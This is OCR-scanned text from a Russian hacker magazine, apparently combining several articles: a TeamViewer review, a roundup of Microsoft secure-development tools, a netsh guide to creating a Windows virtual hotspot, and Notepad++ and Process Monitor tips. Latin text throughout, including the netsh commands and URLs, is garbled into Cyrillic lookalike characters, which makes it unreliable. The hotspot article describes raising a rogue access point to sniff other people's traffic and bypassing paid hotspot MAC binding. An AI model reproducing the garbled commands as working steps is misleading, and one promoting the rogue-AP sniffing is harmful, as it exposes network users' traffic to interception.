для помощи самым ушастым. Если хочешь 
помочь кому-то удаленно, то надо просто дать 
человеку линк на эту сборку программы. Она 
не требует установки и прав администратора. 
Ее нужно просто запустить. Единственное, 
что увидит юзер — это численные иденти- 
фикатор и пароль, с помощью которых ты тут 
же сможешь к нему подключиться. Минута 
на закачку программы. Еще минута на непо- 
нятки вроде «А куда же она скачалась?». И 
через три минуты у тебя уже есть доступ к 
удаленному рабочему столу. С человеком, к 



слову, можно параллельно общаться через 
текстовый и голосовой чаты и даже увидеть 
его изумленное лицо с веб-камеры. 
Поддержка всех популярных платформ. Это 
достоинство я оценил, когда за помощью 
ко мне обратилась девочка с МасВоок’ом. 
Оказалось, что программа отлично чувствует 
себя как под ѴѴіпсІоѵѵз, так и под Мае 05 X и 
Ыпих. Причем для последней ОС-бинарник 
доступен в самых разных форматах: РПМ, 
беЬ, Іаг.дг. Тут нужно сказать, что стандарт- 
ная (полная) версия ТеатѴіеѵѵег включает 
в себя как серверную, так и клиентскую 
часть. Очень удобно, что присоединиться к 
удаленному рабочему столу или принять под- 
ключения можно через один максимально 
упрощенный интерфейс. И это работает для 
любой из платформ. 

Клиент под мобильные устройства. В разделе 
«Загрузки» на официальном сайте доступ- 
ны клиентские приложения для мобильных 
устройств. Сейчас среди поддерживаемых 
платформ — АпбгоісІ и І05 (версии под 
іРбопе и іРаб). Реализация доступа к удален- 
ному рабочему столу через мобильный или 
планшетник, у которых значительно меньшее 
разрешение и нет клавиатуры (а значит, на 
экране необходимо отображать виртуальную), 
выше всяких похвал. Причем опять же — 
приложение работает через 30 или любой 



хотспот, даже если в нем закрыты большин- 
ство портов. Веб-админка без АсбѵеХ и Заѵа. 
Несмотря на то, что ТеатѴіеѵѵег не требует 
установки и может быть запущен практиче- 
ски где угодно, у проекта есть и веб-версия 
для выполнения удаленных подключений 
(на случай, если, скажем, в локалке уста- 
новлены чрезвычайно жесткие политики по 
запуску приложений). Интерфейс ТеатѴіеѵѵег 
ѴѴеЬ Соппесіог доступен по адресу Іодіп. 
Іеатѵіеѵѵег.сот . В отличие от многих дру- 
гих аналогичных решений он реализован 
на НТМІ_/ЕІазб без использования АсбѵеХ 
или Заѵа, которые могут создать трудности с 
запуском. Резюмирую. Что такое ТеатѴіеѵѵег? 
Удивительно отлаженная и простая техноло- 
гия для удаленного рабочего стола, которой 
не страшны жесткие правила файрвола и 
использование І\ІАТ. Мало кто может похва- 
статься такой универсальностью: ТеатѴіеѵѵег 
работает на всех популярных платформах 
— ѴѴіпсІоѵѵз, Ыпих, Мае. А для мобильных 
устройств доступно удобнейшее клиентское 
приложение. Но напоследок я оставил самое 
вкусное. Все это совершенно бесплатно при 
условии некоммерческого использования. 
Спасибо разработчикам! 

Кстати, если есть желание, ты можешь даже 
прочитать статью «Удален ка по-хакерски» 
( хакер.ги/тадагіпе/ха/І 1 6 / 032/1 .азр ) т 



Знать Ю и пароль - все что нужно для подключения через ТеатѴіеѵѵег 
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13Ш1ИТ . 
ДЛЯ БЕЗОПАСНОЙ 
РАЗРАБОТКИ 



Инструменту от МісгозоЙ для тестирования 
приложении и написания надежного кода 



надежного кода 



© Как разрабатывать безопасные приложения? В любой крупной софт- 
верной компании есть свои методологии и рекомендации, но, как пра- 
вило, они никогда не разглашаются. МісгозоН делится со всеми не 
только своим подходом к созданию безопасных приложений, но и 
конкретными инструментами, которые ты можешь использовать. 



Не успел я в прошлой «Колонке редактора» вспомнить про 
МісгозоД и их наработки в области безопасности, как в Москву 
прилетел Стив Липнер. Это удивительный человек. Сложно 
представить, но свой первый отчет об уязвимостях в программ- 
ном обеспечении он написал 40 (!) лет назад. Сейчас Стив рабо- 
тает в МісгозоЛ и отвечает за стратегию безопасности разработ- 
ки ПО, в основе которой лежит принятая компанией в 2004 году 
политика 5БІ_ (Бесигііу Беѵеіортепі ЫГесусІе). 

По сути, 5БІ_ — это набор практик, проверенных временем под- 
ходов и инструментальных средств, которые позволяют разраба- 
тывать безопасный код. Мы уже рассказывали об этой концеп- 
ции в материале «501, или безопасность по МісгозоЛ» пару лет 
назад, и сейчас не будем подробно на этом останавливаться. Так 
что, когда я буду упоминать этот термин, можно воспринимать 
его просто как набор правильных требований и рекомендаций от 
профессионалов. 

Особый интерес во время знакомства с 501 для меня пред- 
ставляли конкретные инструменты для безопасного написания 
кода и тестирования приложения на наличие уязвимостей. 
Многие из них вышли из недр внутреннего использования 
МісгозоЛ и стали публично доступными. Но самое главное, что 



их может использовать каждый из нас, прямо с сегодняшнего 
дня. Большинство из утилит пригодятся не только разработ- 
чикам, но и вообще всем, кто занимается информационной 
безопасностью. Меня приятно удивили слова Стива, который 
рассказал, что за последние два года их стало гораздо больше. 
Я обобщил наш разговор и подготовил для тебя подборку как 
раз таких инструментов, разбив их на несколько тематических 
разделов. 

Анализ бинарников/сборок 

ВіпЗсоре Віпагу Апаіуіег 

Недаром мы уделяем много времени обходу защит ВЕР и А8І_Р. 
Это действительно серьезный барьер для создателей сплойтов, 
который кардинальным образом влияет на возможность экс- 
плуатации найденной уязвимости. 

Чтобы понимать, что представляют собой требования БОБ, вот 
в качестве примера одно из них: «Любое приложение должно 
быть в обязательном порядке защищено как ВЕР, так и А5І_Р». 
Для этого исходник должен быть собран соответственно с фла- 
гами /ЫХСОМРАТ и /БУЫАМІСВАБЕ. Но это лишь одно из тре- 
бований, а с помощью анализатора Віпзсоре 5ВІ_ можно выяс- 



нить, использует ли приложение все рекомендации 
и требования ЗСИ. Программа проверяет, были 
ли установлены требуемые правилами ЗОИ флаги 
компилятора/сборщика, использовались ли самые 
последние версии инструментария и так далее. 
Помимо этого Віпзсоре сообщает об использовании 
опасных конструкций, который являются запрещен- 
ными или нежелательными (к примеру, использова- 
ние указателей на глобальные функции). 

АррѴегіТіег 

Арріісаііоп Ѵегібег — это тоже анализатор, но пред- 
назначен для динамического исследования паііѵе- 
кода и обнаружения программерских ошибок, кото- 
рые сложно отловить во время обычной процедуры 
тестирования приложения. Динамический подход 
подразумевает, что программа анализируется прямо 
во время ее выполнения (это называется гипііте- 
тестированием). АррѴегіІ отслеживает работу про- 
граммы и проверяет, не выполняет ли оно действий, 
опасных сточки зрения безопасности. Например, 
если исследуемое приложение создаст объект без 
дескриптора безопасности или небезопасным обра- 
зом передает параметры в АРІ, то выдается преду- 
преждение. 

АМаск Бигіасе Апаіуіег Веіа 

Определение поверхности атаки — задачка для 
Аііаск Зигіасе Апаіугег. Это один из самых послед- 
них инструментов из лаборатории МісгозоД, о кото- 
ром я рассказывал в «Колонке редактора» прошлого 
номера. 

Анализатор позволяет отследить изменения в систе- 
ме, произошедшие в результате каких-то опреде- 
ленных действий. Например, сделав зпарзЬоЕы до и 
после установки исследуемого приложения и сравнив 
их, можно определить все произошедшие изменения: 
появление новых файлов, ключей реестра, сервисов, 
АсІіѵеХ-компонентов, открытых портов, изменения в 
АСІ_-списках и так далее. 

Анализ кода 

Сосіе Апаіузіз Тог С/С++ 

Автоматизированное исследование исходных кодов 
на наличие признаков уязвимостей называется 
статическим тестированием. В свою очередь, Собе 
Апаіузіз Іог С/С++ является стандартным статическим 
анализатором кода и по умолчанию входит в состав 
некоторых редакций Ѵізиаі Зіисііо. 

Продуманные механизмы позволяют автоматизи- 
ровать поиск в паііѵе-коде утечек памяти, неотлов- 
ленных исключений, проблем с быстродействием и, 
конечно же, уязвимостей в области безопасности. 

МісгозоТі Сосіе Апаіузіз ТооІ .ІЧЕТ (САТ. 
ЫЕТ) 

Это тоже утилита для статического анализа, но упо- 
минание .ЫЕТ в названии программы неслучайно: 
она производит анализ управляемого кода (С#, Ѵізиаі 
Вазіс .ЫЕТ, б#). Основная специализация — веб- 
приложения. САТ.ЫЕТ выявляет слабые места, кото- 
рые могут быть впоследствии эксплуатированы через 
такие векторы атак как Сгозз-Зііе Зсгірііпд (Х55), 50Е 
Іщесііоп и ХРаіЬ Іщесііоп. До публичного релиза это 
был исключительно внутренний инструмент в компа- 
нии МісгозоІС 




Стив Липнер занимается вопросами ИБ уже 40 лет 



РхСор 

Это тоже статический анализатор управляемого кода. 
По сути, он проверяет сборки .ЫЕТ на соответствие 
рекомендациям по проектированию библиотек .ЫЕТ 
Егатеѵѵогк. Правда, он тестирует не исходник, а 
компилированный объектный код. ЕхСор использует 
разбор СИ (промежуточный язык, разработанный 
МісгозоД для платформы . N ЕТ) и анализ графа вызо- 
вов для проверки сборок на наличие более чем двух- 
сот различных дефектов. 

Библиотеки 

Апіі-Сгозз 5ііе Бсгірііпд (АпІі-ХББ) 

Ц Ь гагу 

Многие из уязвимостей можно заранее предупредить, 
если предложить разработчикам соответствующие 
инструменты. К примеру, АпІі-ХЗЗ разработана спе- 
циально для того, чтобы уменьшить вероятность осу- 
ществления ХЗЗ-атак на веб-приложения. Важно, что 
решение включает в себя что-то вроде ѴѴАЕ (файрвол 
для веб-приложения) — так называемый Зесигііу 
Рипііте Епдіпе (5РЕ). Это движок, запущенный в 
виде НТТР-модуля, который обеспечивает дополни- 
тельный уровень защиты для веб-приложения без 
необходимости перекомпилирования. 




Подробная информа- 
ция и файлы всехупо- 
мянутыхутилит можно 
найти на официаль- 
ном сайте Зесиге 
Еііесусіе ОеѵеІортепС 
тісгозоИсот/ 
зесигііѵ/гсіі. 



5і1еІ_оск АТІ. Тетріаіе 

Если ты читал статью Алексея Синцова «Глумимся над 
объектами: взлом АсІіѵеХ», то должен хорошо понимать, 
чем грозят ошибки в АсІіѵеХ-компонентах. Библиотека 
ЗіІеБоск Асііѵе Тетріаіе не поможет избавиться от 
оставленных в коде багов, зато на порядок снизит риск 
их эксплуатации. Дело в том, что с помощью АТБ можно 
ограничить запуск АсІіѵеХ- компонентов, используя зара- 
нее определенный список доменных имен и зон безо- 
пасности. Можно сделать так, чтобы АсІіѵеХ-компонент 
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ВіпЗсоре Віпагу Апаіугег 
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МіпіРигг Рііе Рижгег 

выполнялся только в интранете (то есть в локальной сети], но не 
работал на страничках в интернете. Ограничивая возможности по 
эксплуатации уязвимостей, мы заметно снижаем поверхность воз- 
можной атаки. 

ЬаппесІ.Іі 

Если говорить о разработке на С/С++, то особый риск в коде 
представляют команды, позволяющие выполнить ЬіЖег 
оѵегІЧоѵѵ и другие похожие типы атак. Таких команд очень 
много: функции для работы со строками (хзІгсруП, зігсаД), 
деІзП, зргіпіТП, ргіпіТП, зпргіпіТП, зузіод ()] , системные коман- 
ды (ассеззО, сбоѵѵпП, сЬдгрП, сЬтосН), ІтрЕІеП, ІтрпатП, 
ІетрпатП, ткІетрП), а также команды системных вызовов 
(ехесП, зузІетП, рорепО). Вручную исследовать весь код (осо- 
бенно если он состоит из нескольких тысяч строк) довольно 
утомительно. Это проверяют статические анализаторы, но есть 
еще один вариант — использовать специальный заголовочный 
файл, который не допустит использования функций, давно не 
рекомендуемых к использованию (и, естественно, запрещенных 
50І_). 

Проектирование 

5РІ. ДігеаІ Мосіеііпд ТооІ 

Важной частью проектирования будущего программного про- 
дукта является моделирование угроз. Результатом моделиро- 
вания является схема основных элементов будущей системы и 
обозначенные на ней границы доверия. 

Так вот 50І_ ТЬгеаІ: Мобеііпд ТооІ позволяет экспертам в обла- 
сти, не связанной с безопасностью, создавать и анализиро- 
вать модели угроз. Используя полученные диаграммы, можно 
распознать возможную опасность и выполнить ее смягчение. 
50І_ ТЬгеаІ Мосіеііпд ТооІ сама предлагает подсказки во время 
построения диаграмм и указывает на возможные просчеты. 

5РІ. Ргосезз Тетріаіе 

Для Ѵізиаі Эіисііо (что неудивительно) доступен специальный 
шаблон, который автоматически интегрирует политику, процесс 
и средства, связанные с руководством по процессу МісгозоІТ 
ЭРЕ непосредственно в среду разработки. Таким образом, соз- 
давая проект на основе этого шаблона, придется выполнять все 
условия ЭРЕ. И это очень правильно. 



Фаззеры 

МіпіРин Рііе Ринег 

Согласно ЭРЕ, в качестве одного из обязательных этапов про- 
верки приложения (на стадии верификации) должен исполь- 
зоваться фаззинг, то есть тестирование случайными входными 
данными. МіпТи 22 Рііе Риггег — основное средство нечеткого 
тестирования, разработанное для упрощения поиска проблем, 
которые могут привести к уязвимости системы безопасности в 
коде обработки файлов. Тулза генерирует различные варианты 
содержания файла и «скармливает» его приложению, пытаясь 
выявить необрабатываемые исключения. 

ЗРІ. Кедех Рииег 

Средство нечеткого тестирования регулярных выраже- 
ний (Редех) — это еще один фаззер, который опубликовала 
Місгозоіі. ЭРЕ Редех Рііггег позволяет выполнять проверку 
регулярных выражений на наличие потенциальных уязвимостей 
типа «отказ в обслуживании». Это неспроста. Регулярные выра- 
жения (особенно в нагруженных участках кода) нужно исполь- 
зовать очень аккуратно. Регулярные выражения, содержащие 
паттерны, которые выполняются за экспоненциальное время 
(например, повторение фрагментов, которые сами являются 
повторяющимися), могут быть использованы злоумышленни- 
ками для осуществления ОоЭ-атаки. Фаззер, в свою очередь, 
позволяет прямо во время разработки выявить возможные уяз- 
вимости в регекспах, т 
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ВИРТУАЛЬНЫЙ 

хотспот 

Делимся инетом, поднимем РодцеАР 
расширяем диапазон действия ѵѵі-Рі сети 

о Необходимость создать виртуальный хотспот на ноутбуке может 
возникнуть по разным причинам. Кому-то важно расшарить доступ в 
инет через 36- или №Мах-модем для других беспроводных устройств. 
А кто-то хочет сделать фейковую точку доступа (Родие АР) и, завле- 
кая клиентов, снифать их трафик. Но мало кто знает, что возможность 
для этого встроена в саму винду! 



С появлением у сотовых операторов покрытия 30-сети я все ного коннекта. Тем более, что такие девайсы стоят очень деше- 

чаще стал использовать мобильный интернет. Если работать во и продаются в комплекте с весьма вменяемыми тарифами, 

через ІІ5В-модем, то нередко удается добиться довольно снос- которые не разорят в первый же день использования. 



► 038 
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газнешянная сеть запущена. 



Настраиваем программный хотспот через пеІзЬ 



Одной из проблем, на которые я заморочился после 
покупки 36-модема, стала организация из ноутбу- 
ка хотспота, чтобы по ѴѴі-РІ можно было раздавать 
мобильный интернет для других беспроводных 
устройств. 

Если посмотреть подборку софта на нашем диске, то 
легко найдутся сразу несколько программ, позволя- 
ющих быстро поднять софтварную точку доступа на 
основе ѴѴіпсІоѵѵз-системы. Меня всегда удивляло их 
ограничение — утилиты работают только на ѴѴіпсІоѵѵз 
7 и ѴѴіпсІоѵѵз 2008 Зегѵег Р2. Объяснение оказалось 
очень простым. 

Дело в том, что в этих системах впервые была реа- 
лизована фича ѴѴі геіезз Нозіесі ІМеІѵѵогк (в русском 
переводе — размещенная сеть). Теперь, чтобы сде- 
лать виртуальную точку доступа, не нужно ничего, 
кроме стандартных инструментов винды. 

Как это работает? 

По сути технология ѴѴігеІезз Нозіеб ІМеІѵѵогк — это 
симбиоз двух ПОДХОДОВ: 

• виртуализации нескольких виртуальных беспро- 
водных адаптеров на основе одного физического 
(Ѵігіиаі ѴѴіРі); 

• организации программной точки доступа с помо- 
щью одного из виртуальных беспроводных адапте- 
ров (ЭоЛАР). 

ѴИиаІѴѴТІ является интересным примером виртуа- 
лизации, с помощью которой становится возмож- 
ным использовать ресурсы одного ѴѴІ_АІ\І-адаптера, 
чтобы работать в нескольких беспроводных сетях. С 
ее помощью можно поднять несколько виртуальных 
беспроводных адаптеров, отдельно сконфигури- 
ровать и подключить к разным точкам доступа, но 
при этом все они будут использовать ресурсы одно- 
го и того же физического устройства. Технология 
ЭоЛАР в свою очередь позволяет перевести любой 
из виртуальных адаптеров в инфраструктурный 
режим (іпітазітисіиге тобе), чтобы иметь возмож- 
ность принимать подключения других беспроводных 
клиентов. Таким образом ноутбук легко превраща- 
ется в хотспот для доступа в Сети, через который 
можно расшарить что угодно: имеющиеся ѴѴІ_АІ\І- 
соединения (оцени прелести Ѵігіиаі ѴѴі Рі — мы уже 



4 кейса использования 
виртуального хотспота 



1. Расшарить интернет. 

Если на ноутбуке есть инет, то почему бы не поде- 
литься им с другими беспроводными устройствами. 
Это особенно актуально, если в распоряжении есть 
115В 36-модем с хорошей скоростью и дешевым 
трафиком. Если ты работаешь через платный хот- 
спот, где обычно осуществляется привязка к МАС- 
адресу, то это реальный способ не платить дважды 
и не проходить дурацкую процедуру авторизации 
через специальную страницу входа. 

2. Расширить диапазон действия беспроводной 
сети. 

Если на границе действия беспроводной сети рас- 
положить ноутбуки с запущенной программной 
точкой доступа, то они легко смогут выполнять роль 
ретрансляторов. Особенно хорошо это будет рабо- 
тать, если на виртуальных адаптерах склонировать 
параметры родительской ѴѴі-Еі сети (в программе 
СоппесТіТу есть даже опция «Сіопе ѴѴі-Еі ЭеЛіпдз»), 
Тогда все сторонние устройства смогут переподклю- 
чаться к «ретрансляторам» автоматически. 

3. Поднять ГСодие АР и снифать чужой трафик. 

Мы уже не раз писали о том, как плохие парни могут 
поднять фейковую точку доступа и снифать весь 
трафик подключившихся к ней клиентов. Любой 
запущенный снифер вроде ѴѴі гезЬагк, 0x4553- 
Іпіегсеріег или ІЧеІѵѵогк Міпег отловит массу инте- 
ресного. Для усиления эффекта поднимать хотспот 
лучше с помощью ІІЭВ-донгла с внешней антенной, 
чтобы уточки доступа был более высокий (а значит, 
более выгодный для клиентов) уровень сигнала. 

4. Безопасное туннелирование трафика. 

К сожалению, далеко не все устройства умеют 
работать через ѴРІ\І-соединение. И тем более через 
какой-нибудь ОрепѴРІМ или Тог. Но если поднять 
виртуальный хотспот, то весь трафик подключенных 
клиентов можно принудительно пустить как раз 
через защищенное подключение. Кейс особенно 
важен, если работа осуществляется в открытой сети. 




НТТР://ѴѴѴѴѴѴ 

I г 

> Ііпкз 

• Примерный список 
устройств с поддерж- 
кой ѴѴігеІезз НозіесІ 
ЫеТ/ѵогк: 

Ьир://доо.д[/Зр76д ; 

• описаниетехно- 
логии на страничке 
МЭРЫ: 

Шр://доо.діѴбд р2у: 

• демонстрация того, 
как можно расшарить 
диапазон беспровод- 
ной сети: 

ЬЛр://доо.д[МУиЕ 
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подключены к беспроводной сети, но при этом сами являемся 
точкой доступа для других клиентов), подключение через 
36-модем, ѴѴіМах-адаптер или кабельный еі бете!- интер нет. 
Единственным требованием для использования этой фичи 
является поддержка ѴѴі геіезз Нозіесі Ыеіѵѵогк драйверами бес- 
проводного адаптера. К счастью, для многих (но, к сожалению, 
не для всех) старых адаптеров были выпущены обновления с 
поддержкой ѴѴігеІезз Нозіесі Ыеіѵѵогк, а для современных это 
является стандартом де-факто. Более того, такая поддержка 
является обязательной, чтобы драйвер устройства мог полу- 
чить значок совместимости с ѴѴіпсІоѵѵз 7. Поэтому если у тебя 
есть необходимость поднять виртуальный хотспот, то с большой 
вероятностью все получится. 

Как использовать? 

Даже если сильно поискать, то нигде, ни в настройках сетевого 
адаптера, ни где-либо еще, ты не найдешь такой функции, как 
ѴѴі геіезз Нозіесі Ыеіѵѵогк. Ее там и нет. Сам Місгозоіф вероятно, 
позиционирует это как фишку для продвинутых пользователей, 
поэтому заюзать ее можно только двумя путями: воспользо- 
ваться приложениями от сторонних разработчиков, которые 
применяют специальные АРІ-вызовы системы (они хорошо 
описаны в М50ІМ), или использовать команды сетевого шелла 
пеізб (пеіѵѵогк збеЩ. Поскольку Ыеізб.ехе встроен в систему по 
умолчанию, то это наиболее интересный вариант. 

Шелл предлагает специальный набор команд для работы с бес- 
проводной сетью. 

Полный список можно получить, если набрать в консоли «пеізб 
ѵѵіап /?». Сейчас для нас интерес представляют лишь те, кото- 
рые относятся к размещенной сети. 

Я привел все возможные команды, хотя для настройки про- 
граммной точки доступа потребуются только несколько из них: 

# Запустить или остановить беспроводную размещенную сеть 

пеІгзИ ыіап зііагі: 1 5І:ор Ііо5І:есІпе1:ыогк 

# Разрешить или запретить использование сети 

пеі: зИ ыіап зе* Ііо5І:есІпе1:ыогк [тосІе=]а11оы | сіізаііоы 

# Задать параметры для размещения, а именно 55Ю, ключ 

# пользователя, режим использования ключа (постоянный/временный) 

пеІіБІі ыіап зе* бозііесіпеіімомгк [збісі=]<55ісі> 

[кеу=]<раз5рІіпа5е> [кеуІІ5а§е=]рег5І5І:еп1: |і:етрогагу 

# Обновить ключ для сети 

пеІгзИ міап ге-РгезІі Ііо5І:есІпе1:ыогк [с!а1:а=] кеу 



через пеізб.ехе задаем настройки для нашей виртуальной бес- 
проводной сети: 

пеІгзМ іл/іап зеі: Ііо5І:есІпе1:ыогк тосІе=а11оы ззісІ= ,, Ѵіг1:иа1 
Ноз^ро-Ь" кеу="ра55 разз разз" кеуІІза§е=регзІ5І:еп1: 

Здесь «Ѵігіиаі Нозіроі» — 35Ю сети, «разз разз разз» — посто- 
янный (используется режим «регзізіепі») пароль для под- 
ключения. Успешным выполнением команды можно считать 
появление в «Диспетчере устройств» нового девайса «Адаптер 
мини-порта виртуального ѴѴі Рі МісгозоД» в группе «Сетевые 
адаптеры». 

Не могу не сказать здесь пару слов о безопасности. Технология 
требует обязательного использования шифрования между 
нашей ВоНАР и клиентами, которые будут подключены. По этой 
причине для последних обязательным требованием являет- 
ся поддержка шифрования ѴѴРА2-Р5К/АЕ5 (это ограничение 
можно обойти с помощью сторонних утилит, но об этом ниже). 

2 . Если перейти сейчас в «Панель управления -> Центр управ- 
ления сетями и общим доступом -> Изменение параметров 
адаптера», то мы увидим новое соединение со статусом «Нет 
подключения». Все правильно, мы создали сеть, но еще не 
запустили ее. Устраняем это недоразумение: 

пеіізіі ыіап з^агі: боз1:есІпе1:ыогк 

3. Все, с этого момента наша виртуальная точка доступа работа- 
ет, а другие беспроводные устройства могут к ней подключиться. 
От такого подключения все-таки мало толку, пока мы не расша- 
рим через него имеющийся в распоряжении интернет-канал. 

Для этого ищем в «Панели управления» соединение, через 
которое мы выходим в инет, открываем его свойства, переходим 
на вкладку «Доступ» и включаем опцию «Разрешить другим 
пользователям сети использовать подключение к интернету 
данного компьютера». 

В выпадающем списке необходимо выбрать сеть, для клиентов 
которой мы хотим расшарить инет, — соответственно, указыва- 
ем здесь созданную нами с помощью ѴѴігеІезз Нозіесі Ыеіѵѵогк 
беспроводную сеть. Такая весьма простая настройка включит 
встроенную в винду функцию Іпіегпеі Соппесііоп Эбагіпд (ІС5). 
Теперь всем подключаемым клиентам автоматически будет 
выдаваться ІР-адрес (с помощью ОНСР-сервера), а их выход 
в Сеть будет осуществляться через ЫАТ (Ыеіѵѵогк асісігезз 
Ігапзіаііоп). 

Пробуем подключить к нашему хотспоту смартфон и другой ноут- 
бук — вуаля, все работает! 



# Отобразить информацию о размещенной сети, а также параметры 

# безопасности (в том числе используемый ключ) 

пеі: зИ ыіап бііоы ІіозІіесІпеТыогк [ [зе1:1:іп§=]5есипі1:у] 

# Отобразить настройки беспроводной сети 
пеТвІі ыіап бііоы зе1:1:іп§5 

Как настроить? 

Перед тем как приступать к примеру, еще раз повторю: все, что 
необходимо для использования ѴѴігеІезз Нозіеб Ыеіѵѵогк, — это 
ноутбук с адаптером, драйвера которого поддерживают функцию 
Ѵігіиаі ѴѴі Рі . Последнее очень важно: на моем стареньком Азиз с 
интегрированным Іпіеі 3945АВ6 виртуализация ѴѴІ_АЫ-адаптера 
не заработала даже с последними драйверами. Хотя обновить 
драйверы беспроводного модуля — это в любом случае первое, 
что нужно сделать. Далее все проще простого. 

1. Открываем командную строку с правами администратора и 



Как упростить жизнь? 

Итак, чтобы поднять полноценный хотспот, нам понадобилось 
всего несколько команд в консоли и пара кликов мыши. Но 
спешу огорчить: сразу после перезагрузки или выхода из систе- 
мы (даже в режим сна) все операции придется проделывать 
заново. Это неудобно и утомительно. К счастью, нашлось немало 
разработчиков, которые прочитали в М50Ы статью о ѴѴі геіезз 
Нозіесі Ыеіѵѵогк и реализовали утилиты для более простой и 
понятной настройки программного хотспота. 

Я рекомендую две: Ѵігіиаі Роиіег ( ѵігіиаігоиіег.сосіеріех.сопп ) и 
Соппесіііу ( соппесШу.те ). Обе бесплатные и позволяют через 
удобный 6111-интерфейс выбрать подключение, которое нужно 
расшарить с помощью программной точки доступа, а затем в 
два клика поднять хотспот. 

При этом не нужно каждый раз вводить 55Ю и ключ сети: все 
будет работать даже после перезагрузки. Ѵігіиаі Роиіег предо- 
ставляет минимум функционала и давно не развивается, зато 
распространяется с открытыми исходниками (хороший пример 
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Цва беспроводных адаптера, 
один из них — виртуальный 
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СОММЕСТІРѴ 



Соппесійу — наиболее продвинутое решение для 
организации хотспота на ноутбуке 




использования соответствующих АРІ-вызовов системы). 

По сути, это графическая версия команд пеізб. Утилита 
СоппесШу — намного более навороченная. Для реализации 



Виртуальный хотспот 
в других ОС 



ІЛиіпІи 

Единственной проблемой при создании хотспота на базе 
Ыпих, так же как и под ѴѴіпбоѵѵз, может стать неподходя- 
щее оборудование. Чтобы выяснить, подходит твой девайс 
или нет, есть отличный ресурс: ѵѵігеіезз . Если 

вбить в поле «Поиск» название своего беспроводного 
адаптера, то получишь полную информацию об имею- 
щихся драйверах и поддерживаемых опциях. Заветные 
слова «Аб-Нос Мобе» в разделе «ѴѴогкіпд» — это хоро- 
ший знак. Дальше в ход идут стандартные инструменты, 
о настройке которых подробно написано в ѵѵікі: 
беІр.иЬипШ.гиАл/ікіАлШІ ар . 

Мае ОХ X 

В Мае 03 X заставить работать стандартный адаптер 
в режиме ІпШазІтисШге, наверное, не выйдет. Но зато 
расшарить интернет для одного единственного клиента, 
который подключится к МасВоок через беспроводную 
сеть можно, даже не залезая в консоль. Инструкция 
здесь: 



дополнительных фишек, не предусмотренных стандартными 
возможностями винды, ей даже приходится устанавливать в 
систему виртуальные устройства и драйвера. И это дает плоды. 

К примеру, можно не привязывать к жестко зашитому ѴѴігеІезз 
Нозіеб Ыеіѵѵогк типу шифрования ѴѴРА2-Р5К/АЕ5: если есть 
желание, создавай хоть открытый хотспот. 

Это особенно важно, чтобы клонировать параметры уже имею- 
щейся беспроводной сети (например, чтобы расширить ее диа- 
пазон действия или поднять фейковую точку доступа). Помимо 
этого, СоппесШу имеет встроенный ІіРпР-сервер и позволяет 
расшарить ѴРЫ-соединение (в том числе ОрепѴРЫ). С такими-то 
возможностями твой виртуальный хотспот точно найдет приме- 
нение. Но чтобы было проще понять, в каких ситуациях он необ- 
ходим, мы подготовили для тебя подборку наиболее популярных 
кейсов. Ты можешь прочитать о них во врезке, т 
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■ ■ Алексей «бгеепйод» Тюрин, ОЗесРВ.ги, Оідііаі Зесигііу (адггггіодГСдтаіІ.сот) 






ЗАДАЧА: АВТОМАТИЗИРОВАТЬ 
РУТИННЫЕ ДЕЙСТВИЯ НАД ТЕКСТОМ 
ПОСРЕДСТВОМ ІМОТЕРАР++. 



РЕШЕНИЕ: 

Еще один пост про автоматизацию и ее блага для обычных людей :). 
Решая те или иные задачи, почти все сталкиваются с необходимо- 
стью «обрабатывать» какие-то текстовые файлики. 

В околохакерских делах это особенно заметно — большинство тулз 
используют их в качестве входных/выходных параметров, часто 
приходиться конвертировать. Под піх’ами все с этим делом отлично, 
а вот в вин де — совсем нет. Конечно, можно «эмулировать» *піх и по- 
ставить дгер и даѵѵк под винду ( дпи.огд/зо^ѵѵаге ). но юзать виндовую 
недоконсоль — это издевательство над собой. Решение пришло в 
виде І\ІоІерасІ++. Это прекрасная вещь, особенно учитывая всевоз- 
можные дополнительные плагины к нему. 

Возьмем, для примера, задачку — конвертировать вывод Саіп’а в вид, 
удобный для поиска/сортировки. В решении данной задачки нам 
может помочь одна из следующих функций ЫоіерасІ-м-: либо поиск/за- 
мена с поддержкой регулярных выражений, либо макросы. 

В случае использования поиска, замены и гедехр’ов последователь- 
ность действий будет иметь вид: 




1) л .*:\5 меняем на пустую строку 

2) \г\п на : 

3) ; на \ г \ п 

Хотелось бы отметить, что в N оіерасі-ы- не все возможности гедехр’ов 
работают, а жаль. Но в данном случае более эффективным будет 
использование макросов. Сначала запускаем запись («Макросы 
-> Стартзаписи»), выполняем необходимую последовательность 
действий, останавливаем запись. Далее макрос можно сохранить 
и забиндить на какую-то последовательность клавиш. В задачке с 
Саіп’ом лучше накликать последовательность для одной записи и за- 
пустить макрос до конца файла. Также желательно чаще юзать кнопки 
типа <Ноте>, <Епб>. Сохраняемые макросы можно увидеть в файле 
Ббогісиіз.хті. Лежит он либо в папке с І\ІоІерасІ++, либо в %АРР0АТА% 
в многопользовательском режиме. Там же их можно отредактировать. 
С этим все просто, кроме кодов клавиш, но их можно почерпнуть от- 
сюда : поіерасі-ріив-ріив.ги/иріоасіз/сосі.гір . 




По-шустрому конвертируем в удобоваримый вид 




ЗАДАЧА: ПРОСЛЕДИТЬ ЗА ДЕЙСТВИЯМИ 
ПРОЦЕССА, ИСПОЛЬЗУЯ РКОСЕ55 
МОІМІТОК. 



РЕШЕНИЕ: 

Если ты знаком стулзами Эузіпіегпаі.то можешь пропустить следую- 
щийтекст. Еслиженет— качаем ( зѵзіпіегпаіз.сот ) и знакомимся. Там 
реально много всякого интересного и полезного для всех: отадминов 
до ресерчеров (ну и крайности :) ). 

Для решения задачи, связанной с отслеживанием производимых 
каким-то процессом действий, нам потребуется Ргосезз Мопііог 
(ргостоп.ехе). 

Это чрезвычайно удобная и полезная тулза. Мониторит активность, 
связанную с файловой системой, реестром, взаимодействием 
между процессами и по сети. К примеру, для описанной выше за- 
дачи с N оіера сі-ы- требовалось найти, где хранится збогісиіз.хті. 
Решение: 



1. Запускаем І\Іо1:ерасІ++ и Ргостоп. 

2. Прописываем фильтр в Ргостоп: «Ргосезз пате із по1:ерасІ++.ехе» 

3. Закрываем І\Іо1:ерасІ++. 

4. Смотрим на взаимодействие с файловой системой ОС. 



Есть еще приятная возможность — на уже отфильтрованные записи 
наложить дополнительные фильтры и/или просмотреть, например, 
списокобъектов (файлов, веток реестра), к которым процесс вообще 
обращался. Делается это в «ТооІ5 -> Еііе Эиппппагу», там же наклады- 
ваются дополнительные фильтры (см. скришот). 

Фильтры и логи можно сохранять, а куказанным объектам переме- 
щаться в один клик. Комфорт! Это тулза из разряда «лучше один раз 
